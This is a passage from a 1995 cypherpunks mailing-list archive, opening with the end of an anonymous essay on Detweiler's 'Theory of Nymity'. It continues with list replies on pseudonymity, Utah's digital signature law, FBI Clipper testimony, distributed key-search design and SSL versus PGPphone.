information" may pinpoint the actual identity.

But the question of how the formal or actual context is established is
still unresolved. Detweiler suggested it would be based on the
declarations of the message. If the message "declared" it was from an
actual sender, the actual context applies. If there is no
declaration, the formal context is assumed.

Obviously contradictions can arise within these definitions if the
sender "lies". Detweiler simply observed that a logical theory could
be built up based on his premises from which  conclusions could be
drawn. Furthermore, there is the fundamental observation that in a
formal nymity system, "true" conclusions about actual identity can
only be derived from message contents  if participants "don't lie". A
core premise of the theory is  that an entity can express statements
such as "my true name is [x]" in the communication system. (This
is one form of the "additional information" clause above.)

The cypherpunks believe that if the communication system includes only
the formal context, there is no such thing as a "lie".  Detweiler
however maintained that as long as the actual system exists (or more
particularly the overlay of a formal system over an actual one), lies
can exist, although they may be undetectable within the formal
system. (In this sense it is analogous to a Godel Theorem for Nymity,
making an observation about a phenomenon that "exists" but  is
"undetectable" within the formal system, with the parallelism of
"mathematical" and "metamathematical" statements mapping to "formal"
and  "actual" communication systems.) 

The Detweiler Thesis

Detweiler had a preoccupation for considering the "community", which
is defined as a formal or actual context in which communication takes
place in both ways between a group of entities (i.e. entity A may be
a receiver of sender B and vice versa for all members of the group).
He explored the implications of both the formally and actually
identified communities, and consistently objected to the actual
identification scheme as at least uninteresting  and at most too
constraining, mirroring the quintessentially cypherpunkesque
position. However Detweiler diverged from the philosophy by
repeatedly emphasizing a basic premise, which is currently unprovable
speculation  much the same way that the  Church-Turing thesis is: in
a formally identified community system  where participants don't
"lie" about actual identity, the communication of the "community" is
of "higher quality".

A concrete example from everyday experience is that of book
publishing.  Some books may exist in a "formally identified"
community in which all the authors of the community agree to
associate their actual identity with the book (the "message"). Other
books may exist in a "formally identified" community in which authors
identify themselves other than with their "true names". Detweiler
asserted that a book could "lie" and state that it was to be taken in
the actual context (i.e. "A is the author of this book, and A is not
a pseudonym"). Cypherpunks denied there was such a thing as a  "lie"
this context or even a "true name" in any context.  Essentially they
consider any statements in the message that refer to identity or its
formal vs. actual context as nonexistent, invalid, and/or 
meaningless.

Detweiler suggested that a "scientific community" was an example of a 
communications system dedicated to actual identities, or at least a
formal identification system where the occurence of lying was minimal
and considered anomalous, and  that its "success" in achieving an
overall climate of "quality"  communication is partly due to the
convention.

Detweiler emphasized that it is not the case everyone must be actually
identified in the community to fulfill his thesis (which is expressly
about formal communities, not actual ones), only that parties in the
system "don't lie". The cypherpunks completely, either inadvertently
or deliberately,  misconstrue or obfuscate his position as asserting
that the formal context of nymity is never of "higher quality".
Actually, Detweiler frequently expressed an aversion to the actual
identity community and championed the formal context of communication
as an embodiment of privacy, just as the cypherpunks. But he diverged
from the cypherpunks by insisting that "lies exist" in the formal
context which they heatedly denied.

Another of Detweiler's observations was not only were "lies" possible
in a formal communications system, but there were "worse lies" in
formal systems that embodied two-way community communication. An
example of  this is cyberspace, where a sender can ask questions of
the receiver such as "are you using a pseudonym?" or "are you
communicating under formal names other than [x,y,z]"? (These are
examples of the "additional information" clause above that
discriminates pseudonymity from pseudoanonymity.) He noted that
questions like these can be answered "truthfully" while at the same
time not necessarily divulging actual identities, a distinction
critical to the understanding of Detweilerian theories. The
cypherpunks either asserted that such questions were fundamentally
illegitimate and invariably deserved no answer by the receiver, or
even that any answer (including a "lie") was justified in response.

Detweiler observed that some formal identification systems have some 
other useful properties, such that "if [a] and [b] are different
formal names, [a] and [b] denote different entities". Or, "for all
formal names [a], there is a single entity actually identified as
[a]." Furthermore, in a community where  senders don't "lie", these
properties can actually be derived by  asking particular questions of
the senders. (The question of whether the receiver *must* answer
certain questions, or not at all, leads to additional ramifications.)
Detweiler's very critical observation, however, was that even though
there is additional "knowledge" about the uniqueness of identities in
these systems, the mappings of formal nyms to actual identities
cannot necessarily be derived.  This is the basis of his claim that
even if the entities in a formal system "don't lie", they don't
necessarily reveal their actual identities, and that this critically
desirable property of "privacy" is preserved.

The idea of a "true name" is a very problematic and perplexing 
concept in the same way that the concept of "absolute space" is
troubling to the theory of Newtonian mechanics, which Einsteinian
relativity sought to remove, starting with the premise that "there is
no preferred reference frame". The cypherpunks cite the absurdity of
the "true name" concept in an analogous argument and attempt to
discredit Detweilerian theories on this basis. However the theory is
not based on "true names" but the existence of "entities", hence this
cypherpunk position translated to its most basic form, becomes,
essentially, "unique communication sources (such as 'humans') don't
exist"  (or analogously in the Einsteinian metaphor, "mass and energy
do not exist").

In other words, assuming that "unique entities exist", and statements
about identity can be made in the communication system, it is
possible for entity A to say "my true name is 'C'" in one message and
in another "my true name is 'B'", a situation which would be 
considered a "lie"-- the significance of the reference to the entity
as "A" is irrelevant.  The "true name" of an entity A  is simply
defined as an arbitrary but unique nym which, if considered the
actual identity of A, would not contradict the statements of any of
A's messages (or replies to questions). 

Simply put, the "true name" has the property that if two derivations
in the form "[x] has true name [y]" and "[x] has true name [z]" can
be made from the meanings of [x]'s statements in [x]'s messages, then
y = z. Hence, if entity [x] simultaneously states  "my true name is
[y]" and "my true name is [z]" in any messages (the receiver is
irrelevant) and y != z, then entity [x] is "lying".

The essence of the idea of "true identification" is that there is a
one-to-one mapping between "entities" and "true names". The
representation of the "true name" is irrelevant. Detweiler certainly
did not make the absurd claim that a "true name" had any special
syntactic properties. He also did not claim that "true name
registries" had to be erected to provide the feature, although they
could support it. At the core of the concept is the idea that every
entity in a "truthful" system must make a choice as to their actual
name identification and not "lie" about its properties in messages
that refer to it. 

The cypherpunks ruthlessly ridiculed this concept of communication
explicitly involving "trust" and "honesty" between participants. One
famous objection was that "that which cannot be enforced should not
be prohibited". That is, if the unique mapping of true names to
actual entities was not a precise, mathematical certainty, it
effectively does not exist. Hence the cypherpunks generally base
their model of the reality of communications on fundamentally
different premises than Detweiler which reject the existence of the
concept of "truthfulness".

Detweiler countered by suggesting that communities with communications
based on trust and honesty and the contrary not only both exist, but
that discrepancies between the two probably existed as well and
furthermore were worthy of study. (Again, he conjectured that the
"dishonest" communications forums led to "disharmony" without further
defining the term.) All these distinctions lie in the area Detweiler
denoted under the heading "morality" which again the cypherpunks
generally deny exists in an abstract communications system.

Hence the key formal ideas of the overall theme that communications
systems could lead to significantly different scenarios based on the
"honesty" or "truthfulness" of members of a community with respect to
identity had been addressed for the first time by Detweiler, but at
great cost to Detweiler's credibility within the cypherpunk circles,
which have rebuffed, ridiculed, and excommunicated him. Detweiler
tended to take this as evidence that the core cypherpunk philosophy
was not about seeking privacy, which he went to pains to demonstrate
existed in his "honest" systems, but rather a sort of denial of the 
existence of morality in cyberspace-- that the question of "whether a
message 'lies' about it's authors identity" is inherently
meaningless, a premise he strongly rejected.

The Sociology of Cypherpunkism

Detweiler went far beyond theoretical study in his research of these
areas of Nymity. He considered the cypherpunk beliefs in these areas
worthy of a systematic sociological survey because of the apparent
taboos and stigmas the cypherpunks apparently associated with some of
their positions, either applied by themselves or that they perceived
were held by others. He found they were reluctant to reveal their
true beliefs on the subject and consistently refused to answer even
vague questions like "how many pseudonyms are you using? are you
using any at all? do you think forums where  pseudonyms are not used,
by agreement of participants, are desirable or  could have superior
quality?"

Detweiler believed to have found signs the cypherpunks actually have
very complex beliefs, practices, and techniques in the areas of
identity subterfuge which they refuse to reveal except to fellow
"insiders", something like an elaborate secret religion or unorthodox
sexual practice. For Detweiler, cyberspace and cypherpunkism are a 
microcosm of the way that humanity seems to mix the concepts of
accountability, morality, and identity in an intricate, tangled,
inscrutable web, a place where the ideas of "candor" vs. "privacy"
are viscerally manifested.

Detweiler often observed the interplay between "true name,
pseudonymous, and anonymous"  messages was somewhat analogous to the
Freudian concept of the dance between the superego, ego, and the id,
or formal vs. actual identification systems like the subconscious vs.
the conscious awareness. (He once even compared pseudospoofing
scenarios to demonic posession and multiple personality disorders.) 
Perhaps his most  relentless and enduring theme was that nymity
issues are an area inherently worthy of serious or even intense
scientific inquiry because they lie at the core  of human society and
interactions.

The Detweilerian distinctions are very critical in understanding the
cypherpunk philosophy and the schism with conventional morality he
claimed it embodied.  Essentially the cypherpunks assert "lies about
identity don't exist in cyberspace". Detweiler argued not only that
"lies about identity in cyberspace exist", but further claimed that
"lies about identity diminish the quality of communications within
the community" and that "privacy is not necessarily  compromised by
honesty". However his position is often erroneously lampooned by the
cypherpunks as a ridiculously (but hilariously)  distorted
charicature such as "true name identification should be enforced by 
strict laws of the State because pseudonyms are inherently evil" 
when in fact his distinctions, conclusions, and claims are far more
sophisticated and subtle. 

Whether the Detweiler Thesis asserting "superior quality communication
in honest formal indentification systems" can ever be demonstrated,
and whether the unrecognizably distorted portrayals of his theories
by the  cypherpunks are deliberate or due to the inherent
incomprehensibility of the concept to peculiar brain anatomies, are
the key, unresolved,  "open" questions and matters of further
research in the study of the sociology of cypherpunkism and the
theory of Nymity.


----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Fri, 25 Aug 95 02:52:36 PDT
To: cypherpunks@toad.com
Subject: DigSig laws
Message-ID: <199508250951.DAA13176@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Being a resident of Utah, I was interested in exactly what Utah's digital
signature law was about. I knew it had to be somewhat level-headed, since
a number of people in little silicon valley must have had their fingers in
it... Unfortunately, IANAL for me is more than just a legal disclaimer.
Anyone know of any of the legal eagle (ie, judge-l, eff, etc) have
analyzed it, or know of any summaries that my search didn't find? (I was
lucky to find this link in the first place...)

Here is the utah law:

gopher://gopher.utah.edu/11/Off%20Campus%20Information/State%20of%20Utah/
Utah%20Legislative%20Bills/1995

(I had to manually gopher it, it's under search bills, it's SB0082)

Or perhaps any of you IANAL types would care to try reading it...it sounded
like the key had to be escrowed with a legally recognized agent.


PS: my compliments to Damien. Oh, I mean, the SSL crack looked nice
leading the SF Chronicle's Business headline, but I'm especially thrilled
the way the Signal/Noise ratio suddenly improved overnight. It will make
reading what happened during my vacation much more interesting from that
point on... And for those of you who think that PROMIS is squarely
on-topic, <PLONK!>. When I can get grep routing results to /dev/null for
"whitewater", etc, I'll be sure to share.. 

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMDwC48La+QKZS485AQHnnQL9FllVv82m5a0bl0xg5einnt3KR2X4FhPj
jdTMiWeCPRW6H84/GWzPdhcHrn0ilvtgnwZTYqaL+1KS6wuPkuMcjOLw8VgxLmO9
CyUAee/zipkTyPnSPlgYp5Nvw0vm+gFn
=qurO
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Fri, 25 Aug 95 02:08:56 PDT
To: Cypherpunks Mailing List <cypherpunks@toad.com>
Subject: Re: FBI Files on Clipper Release
In-Reply-To: <9508232014.AA18754@cs.umass.edu>
Message-ID: <Pine.D-G.3.91.950825045109.18777D-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 23 Aug 1995, Futplex wrote:

> A FBI document reads:
> # To ensure that this occurs, legislation mandating the 
> # use of Government-approved encryption products or 
> # adherence to Government encryption criteria is required.
> 
> Ex-AAG Jo Ann Harris told a Senate Judiciary Subcommittee in 1994:
> $ we have absolutely no intention of mandating private use of a particular
> $ kind of cryptography, 
> 
> I ranted:
> % Just what real legal recourse do we have against lying scum in the
> % bureaucracy ?  
> 
> Brian Davis writes:
> > You sure are anxious to prosecute government officials.  
> 
> You're damn right I'm anxious to prosecute government officials who appear
> to have willfully lied about public policy in testimony before Congress !

You must realize that there can be a difference between what agencies say 
is necessary and what policy ultimately becomes on that issue.  It is 
because of that distinction that campaigns, such as the ongoing campaign 
to allow exportation of strong encryption software, are important.  The 
FBI may say they want X, but the policymakers may take the FBI's 
arguments (always with a grain, or a bucket, of salt), consider other 
agencies views, public opinion, the persuasiveness of everyone's 
reasoning, and *then* adopt a policy that satisfies no one completely.
 
> For representative democracy to be even vaguely democratic at all, the 
> representatives need to level with their constituents as much as possible.
> I certainly intend to hold public officials speaking in an official 
> capacity about official business to a high standard of conduct.  

As you, and we all, should.  That doesn't mean prosecution necessarily.  
It may mean private protest (letter to Clinton, Reno, et al.), public 
protest, voting the bastards out, etc.


> > What is untrue about her statement.  Maybe she meant it's OK to use 
> > ROT-13 but nothing else ... 
> > How could that be compatible with "no intention of mandating...a 
    particular  kind of cryptography" ? 

> > > And you guys complained about the Jake Baker prosecution! 

> > Non-sequitur. How is the Baker case relevant to this ? 

I disagree that it is a non sequitur.  

Baker indicted for speech which, to some, constituted a threat.

You seek to prosecute former AAG Harris for speech which, to some, was a lie.

> > -Futplex
<futplex@pseudonym.com> > "Say goodbye to the clowns in Congress" -Elton
John/Bernie Taupin
> 

Sorry I didn't respond sooner -- email got backed up and I'm not reading 
chronologically (for some unknown reason).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 25 Aug 95 04:23:52 PDT
To: an366601@anon.penet.fi
Subject: Re: The Theory of Nymity (value of True Names)
In-Reply-To: <9508250244.AA26841@anon.penet.fi>
Message-ID: <9508251117.AA13712@all.net>
MIME-Version: 1.0
Content-Type: text


> |   /\  |\| /~ L~ anonymously spewed forth
> L_ /~~\ | | \_ L_ as follows:
> 
> The Theory of Nymity
> 
...
> The cypherpunks definitely pioneered forms of nymity, and passionately
> champion the general issue, particulary its ramifications in
> cyberspace; however they refuse to confront the issue openly and
> overtly, suggesting they perceive some sort of stigma or taboo
> associated with their practices.

They seem to be openly confronting the issue to me.  There is a stigma
attached to anonymity - haven't you seen the lone ranger?  If you're
honest, why do you wear a mask?

> They also refuse to contemplate
> negative or potentially disastrous social effects of the associated
> scenarios, asserting all forms of nymity are either indistinguishable
> or essentially morally neutral practices that invariably extend the
> rights of the individual in the face of the oppressive State or
> massive corporations.

I think they contemplate the issues.  I think that most of them (us?)
realize that:

	They are the ones likely to be most harmed by a lack of open and
	honest communication. 

	By identifying themselves they might open themselves to undue
	risk of harm in the form of harassment, arrest, search and
	seizure of personal property, etc.

	The only way they can bot help preserve individual freedom for
	others and remain free themseleves is by saying some things
	anonymously.

> They see all forms of nymity as merely one
> unified hacksaw of the serf, useful and effective in cutting away
> chains of bondage in the Sisyphean struggle for privacy.

They certainly see the advantages over the disadvantages.

> Detweiler confronted the diverse implications of nymity by elevating
> the subject of "nymity" to a study complete in itself. Abstracting
> from his writings, Detweiler considered the concept of a "nym 
> spectrum" involving the key concepts of receiver of a message,
> sender, and identity. At various points on the nym spectrum, the
> receiver has varying degrees of knowledge about the identity of the
> sender.

There are times when identity is important, and there are times when it
is not.  Identity is not important when disclosing a danger - if you
yell "FIRE!!!" in a burning building, nobody is going to say "Hold on
there...  before I get out, what's your name and address, and how can
you prove that you are who you are?" They recognize the danger you
identified and get out of the building.  When I buy a can of fruit juice
from the local store and pay with cash, if they ask my name and address,
I tell them (politely) to stuff it.  You don't need to know my identity
to trade a fungible for goods or services.  That "need to know" phrase
is important here.  Identity is only important to reveal if there is a
legitimate need to know it, and if that need to know outweighs the risks
associated with the knowledge.

...
> Detweiler defined the various forms of nymity based on the knowledge
> of the sender, say party C. This is his critical distinction that
> cypherpunks denied, arguing that all the forms of nymity he saw a
> difference between were really interchangeable and indistinguishable,
> and therefore identical. They do not recognize any relevance of the
> "knowledge" or mental state of the receiver in  regards to messages.
> (In a sense the  philosophy is similar to behaviorism in asserting
> the invalidity of internal mental state.)

I think the cypherpunks recognize that by being anonymous they risk
their message being taken less seriously, but they are willing to take
the risk because most people on this list seem to evaluate the content
of the message more than the sender anyway.  Contrast this list to other
lists and you will see far fewer personality issues here because, in
part, the moderator doesn't inject his/her personality into the
discussion all the time. 

...
> The cypherpunks argue that there is in principle no difference between
> Detweiler's "pseudoanonymity" and the classic "pseudonymity", stating
> that anywhere there is an "actual" nym, a receiver cannot be sure it
> is not really a formal one, and vice versa (i.e., any nym is
> potentially a pseudonym or true name). In fact they say there is
> fundamentally no distinction to be made between formal and actual
> nyms.

No - perhaps some of the cypher punks would argue that, but certainly
not most.  Many cypherpunks use pseudonyms and we trust them to some
extent because of the repeated usage of the pseudonym.

> The critical question is of course is how "actual" and "formal" nyms
> are defined. What does it mean to "identify" a sender with a nym?
> Detweiler adapted to the ambiguities in the following way. He defined
> the "actual nym" (or, interchangeably, the "true name") as an
> identification for party A if for every context where an actual nym
> applies, that party is identified as A. Call this the "actual nym
> scenario".  The definition appears to be somewhat circular but he was
> able to derive conclusions from the premise.

Hogwash.  A rose by any other name would smell as sweet.  Names are just
conveniences created as a part of language because we are able to use
nouns to identify objects.  That guy who runs all.net is just as good as
Fred Cohen in terms of identifying me, and I rarely use my full name,
and there are otyher people in the world with exactly the same full name
as mine - even including the Dr. (a mathematician I believe).

> Suppose that a context was established in which the "actual nym"
> scenario applied, and a message was identified as from "A". Then "A"
> is the actual nym of the sender. Suppose that the context is not
> "actual" (the converse will be considered the "formal") and the
> message is identified as from B. If there is some  "additional
> information" that B is a "true name",  then B is the actual sender,
> and no other party sent the message (forms of the "additional
> information clause will be considered below). Otherwise no conclusion
> can be made about the actual sender.

A lot of conclusions can be made about the sender based on the content
and context of the message. 

> In general, in an "actual context" the actual sender is always the
> formal sender. In a formal context, the actual sender is dissociated
> from the formal identity of the message,  but "independent
> information" may pinpoint the actual identity.
...
> Obviously contradictions can arise within these definitions if the
> sender "lies". Detweiler simply observed that a logical theory could
> be built up based on his premises from which  conclusions could be
> drawn. Furthermore, there is the fundamental observation that in a
> formal nymity system, "true" conclusions about actual identity can
> only be derived from message contents  if participants "don't lie". A
> core premise of the theory is  that an entity can express statements
> such as "my true name is [x]" in the communication system. (This
> is one form of the "additional information" clause above.)

Baloney.  If someone claims to be me (likely a masochist) and I am
listening, I can identify it for all to see.  As long as the society
doesn't tollerate excessive amounts of this and fights back against the
lack of integrity, it is likely that any person who does this will be
detected.  The point here is that identity in the form of a name is only
a tag we attach for convenience of associating actions with individuals. 
It doesn't matter what the name is - I don't know the real name of
HOBBIT, but I know that s/he says a lot of sensible things. 

> The cypherpunks believe that if the communication system includes only
> the formal context, there is no such thing as a "lie".  Detweiler
> however maintained that as long as the actual system exists (or more
> particularly the overlay of a formal system over an actual one), lies
> can exist, although they may be undetectable within the formal
> system. (In this sense it is analogous to a Godel Theorem for Nymity,
> making an observation about a phenomenon that "exists" but  is
> "undetectable" within the formal system, with the parallelism of
> "mathematical" and "metamathematical" statements mapping to "formal"
> and  "actual" communication systems.) 

Lies are relative things, not absolutes.  There is no "actual" system
and there never was.  Detweiler assumes that the way s/he identifies
people is the "actual" system, but that's only one perspective.  Many of
us have grown up knowing about more than one system of identities, and
apparently Detweiler missed this one.

> The Detweiler Thesis
> 
> Detweiler had a preoccupation for considering the "community", which
> is defined as a formal or actual context in which communication takes
> place in both ways between a group of entities (i.e. entity A may be
> a receiver of sender B and vice versa for all members of the group).
> He explored the implications of both the formally and actually
> identified communities, and consistently objected to the actual
> identification scheme as at least uninteresting  and at most too
> constraining, mirroring the quintessentially cypherpunkesque
> position. However Detweiler diverged from the philosophy by
> repeatedly emphasizing a basic premise, which is currently unprovable
> speculation  much the same way that the  Church-Turing thesis is: in
> a formally identified community system  where participants don't
> "lie" about actual identity, the communication of the "community" is
> of "higher quality".

The first error is usually the basic assumption.  This one is not a very
accurate reflection of the reality that many of us in the world live in
today.  The fact is, our political system is full of people who use one
and only one identity and have done so for their entire lives, and yet
it is jam packed with lies and crude (As well as sophistocated) attempts
at tricking people with communications.  The cypherpunks, who have far
more uses of pseudonyms have far fewer deceptions and far better
communications in my experience.  Many things that cannot be proven
are actually false.  This counterexample demostrated that Detweiler is
not just unprovable, s/he is wrong.

...

All of the confirmations Detweiler may be able to come up with can't
overwhealm the one counterexample just cited, however, I can cite many
more counterexamples.  By the way, counter to Detweiler's proposition,
plenty of scientists lie about results, and many University professors
who claim to be scientists lie about the true state of their work so
that they can propose research grants that are certain to be successes
(it is a common practice to propose work you have already completed so
as to assure that you will be successful and thus get the next grant). 

...
> The idea of a "true name" is a very problematic and perplexing 
> concept in the same way that the concept of "absolute space" is
> troubling to the theory of Newtonian mechanics, which Einsteinian
> relativity sought to remove, starting with the premise that "there is
> no preferred reference frame". The cypherpunks cite the absurdity of
> the "true name" concept in an analogous argument and attempt to
> discredit Detweilerian theories on this basis. However the theory is
> not based on "true names" but the existence of "entities", hence this
> cypherpunk position translated to its most basic form, becomes,
> essentially, "unique communication sources (such as 'humans') don't
> exist"  (or analogously in the Einsteinian metaphor, "mass and energy
> do not exist").

I have discounted his/her thesis on the basis of its lack of accurately
predicting or reflecting reality and on no other basis.  It may be an
interesting theory, but in practice it seems to have been refuted.

...
> The essence of the idea of "true identification" is that there is a
> one-to-one mapping between "entities" and "true names". The
> representation of the "true name" is irrelevant. Detweiler certainly
> did not make the absurd claim that a "true name" had any special
> syntactic properties. He also did not claim that "true name
> registries" had to be erected to provide the feature, although they
> could support it. At the core of the concept is the idea that every
> entity in a "truthful" system must make a choice as to their actual
> name identification and not "lie" about its properties in messages
> that refer to it. 

So legal name changes are not allowable? Two people can't have the same
name? This doesn't map to the current reality.  It sounds more like a
government imposed identity number system - like the one in Nazi Germany
that contributed to the extermination of 6 million Jews.  I'm against it.

...
> Detweiler countered by suggesting that communities with communications
> based on trust and honesty and the contrary not only both exist, but
> that discrepancies between the two probably existed as well and
> furthermore were worthy of study. (Again, he conjectured that the
> "dishonest" communications forums led to "disharmony" without further
> defining the term.) All these distinctions lie in the area Detweiler
> denoted under the heading "morality" which again the cypherpunks
> generally deny exists in an abstract communications system.

He said - she said.  It's just a bunch of baloney.  Lies are often the
basis for harmony and being "too honest" generally gets you very little. 
The important thing about communication is that you get other people to
think about the things you think about.  It's just a way of affecting
brain states in other entities and nothing more.  Truth, lies, and video
tape can all do this.

> Hence the key formal ideas of the overall theme that communications
> systems could lead to significantly different scenarios based on the
> "honesty" or "truthfulness" of members of a community with respect to
> identity had been addressed for the first time by Detweiler,

I appreciate Detweiler's attempt, but it's a failure (oops better try
only a partial success) because it doesn't reflect the reality.

> but at
> great cost to Detweiler's credibility within the cypherpunk circles,
> which have rebuffed, ridiculed, and excommunicated him.

If you can't take the heat, stay out of the chemistry lab.  I say lots
of things that people don't like and gripe about.  If Detweiler can't
shake it off and come back with something better, s/he's overly
sensitive.  What do you expect? That people will embrace your
characterization of them just because you think it's interesting? If
Detweiler is really right, then s/he should fight back with the
strongest weapons that exist in this forum - the facts.  As far as I can
see, the facts are against Detweiler, but s/he may prove me wrong in
open debate, and as far as I can tell, the cypherpunks will agree with
Detweiler if s/he is right.

> Detweiler
> tended to take this as evidence that the core cypherpunk philosophy
> was not about seeking privacy, which he went to pains to demonstrate
> existed in his "honest" systems, but rather a sort of denial of the 
> existence of morality in cyberspace-- that the question of "whether a
> message 'lies' about it's authors identity" is inherently
> meaningless, a premise he strongly rejected.

On this, Detweiler is clearly incorrect from my view.

I don't want to waste further space on this.  I'm already sorry I spoke
up on it and I haven't even sent the mail yet. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Fri, 25 Aug 95 04:45:44 PDT
To: Piete.Brooks@cl.cam.ac.uk (Piete Brooks)
Subject: improving the distributed computation
In-Reply-To: <"swan.cl.cam.:226410:950825111043"@cl.cam.ac.uk>
Message-ID: <9508251143.AA15702@all.net>
MIME-Version: 1.0
Content-Type: text


I thought I might give some free (an worth it) advice on the next round
of attempts.  This distributed computation is somewhat related to viral
computation, and I have learned a few things over the years that may be
helpful in doing a better job of it.

1) Abandon the central command way of doing things.  Little if any
communication is required for this computation, it should be
self-distributing to and between volenteer sites.  That makes it ideal
for implementation as a safe virus. 

2) Give these computations a defined and limited lifetime.  The problem
you have with old versions is because they don't die automatically or
even check to see if they are up-to-date and update themselves.

3) Use randomness to break up the search space and redundantly perform
the computation.  This should eliminate the problems with malicious
key-space requests, etc.

4) Use feedback in the form of selective survival/replication to
optimize the search and allocate search space.  If a processor goes
quickly, give it more to do - if it goes slowly, give it less.  This
will produce an overall system that adapts with time to the cahges in
network and system usage so as to optimize overall performance as a
function of time.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 25 Aug 95 04:53:37 PDT
To: cypherpunks@toad.com
Subject: Two URLs of interest
Message-ID: <v02120d00ac63647ee6c1@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

From: Tom Limoncelli <tal@plts.org>
Subject: Two URLs of interest
To: www-buyinfo@allegra.att.com
Date: Thu, 24 Aug 95 22:26:14 EDT
Cc: mp@allegra.att.com, drew@allegra.att.com, rn@big.att.com,
        skbk@research.att.com, tommy@big.att.com, rjf@big.att.com,
        varga@big.att.com, geoffc@allegra.att.com

First, (and not really related to this mailing list) is an article by
Arnold Kling explaining why Netscape stock was so popular, and why
people who purchased stock in the first couple of hours are now
$13/share in the hole.  (stock opened at $71, declined to $53ish, and
now hovers at $58ish)   He also explains where he thinks the price will go.
        http://www.enews.com/contrib/bagholders.html

Second, Pat Robertson's "The 700 Club" now has a WWW site and on it he
advertises a new video tape http://the700club.org/cbn/telethon.html
where he predicts the end of the world.  What has that got to do with
"www-buyinfo"?  Well, one segment is described as:
        "This story examines the oncoming rush to digital cash [...]
        and how quickly businesses, financial institutions, and even
        the government are moving in this direction."
For those of you without a copy of Revelations handy, this is a Mark
Of The Beast according to him.  You'll have to buy the video to find
out why.  Revelations is on-line (along with the whole bible) at:
        http://www.gospelcom.net/cgi-bin/bible?&passage=Revelation


Sorry for the almost completely non-technical post.

Have a good weekend, y'all!
--tal

--
     Tom Limoncelli -- tal@plts.org (home) -- tal@research.att.com (work)
http://mars.superlink.net/user/tal     "I tried netsex, didn't like it."
http://www.qrd.org/QRD/www/usa/nj       "Maybe you just haven't met the
http://www.qrd.org/QRD/www/usa/nj/BNNJ      right keyboard?"

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Fri, 25 Aug 95 00:34:10 PDT
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Crypto DLL's/SSLeay 0.4.5
In-Reply-To: <199508241311.JAA13033@frankenstein.piermont.com>
Message-ID: <Pine.SOL.3.91.950825081153.9077E-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 24 Aug 1995, Perry E. Metzger wrote:
> Eric Young writes:
> > On the PGPphone issue, I Personally I feel SSLphone would be a much 
> > better way of doing things.
> Oh, yeah? No user certificates, no way to verify whats on the other
> end. No assurances that you aren't being tricked into using a weak
> algorithm because negotiation doesn't take place under cover of
> signature. Lots of little potential cracks. Thanks, but no thanks.

:-) Agreed, it depends on how you use SSL and implement it, I have not 
added it yet but I'll put in my library hooks so an application can 
refuse to use certain ciphers that are in the library.  Currently you 
can specify your preference of cipher and there 
is a call to return the cipher being used on an SSL connection.  The most 
recent version of SSLtelnet of ours prints the subject name of the server 
and the cipher being used, just so you can know if you are using RC4-40 :-).

As for authentication, agreed, the key distribution problem for X509 
needs work but still, if the audio is good enough, you should know who is 
on the other end :-).

> This is not to slight your code. I'm slighting the protocol.
none taken, my main support for SSL is that there is minimal work to be 
done to make an application support encryption (+ perhaps authentication) 
over a connection.  This means that any work done to improve the SSL 
library (as in certificate distribution and verification) will instantly 
be able to be added to all applications using that SSL library.  If each 
one of 15 different appliction has a different cipher/authentication 
package, there is 15 times the work to upgrade.
Hell, to put PGP type authentication in SSL would probably not be very hard.
It would require a new certificate type and a new 'verify certificate' 
routine and that would be about it.
Basically I'm a bit lazy, I like to write libraries and then keep on 
reusing them.

> > For phone over modem, authentication is not really required
> And why is that?
Again, if the voice is clean enough, you should know who is at the other end.
If you are talking about a program being at the other end, well thats 
another matter :-).

eric
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups that the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lethin@ai.mit.edu (Rich Lethin)
Date: Fri, 25 Aug 95 06:30:05 PDT
To: cypherpunks@toad.com
Subject: [pagre@weber.ucsd.edu: computers are the crime scenes of the future]
Message-ID: <9508251329.AA27206@grape-nuts>
MIME-Version: 1.0
Content-Type: text/plain



Resent-Date: Thu, 24 Aug 1995 08:08:10 -0700
Date: Thu, 24 Aug 1995 07:59:52 -0700
From: Phil Agre <pagre@weber.ucsd.edu>
To: rre@weber.ucsd.edu
Subject: computers are the crime scenes of the future
Resent-From: rre@weber.ucsd.edu
Reply-To: rre-maintainers@weber.ucsd.edu
X-Url: http://communication.ucsd.edu/pagre/rre.html
X-Mailing-List: <rre@weber.ucsd.edu> archive/latest/793
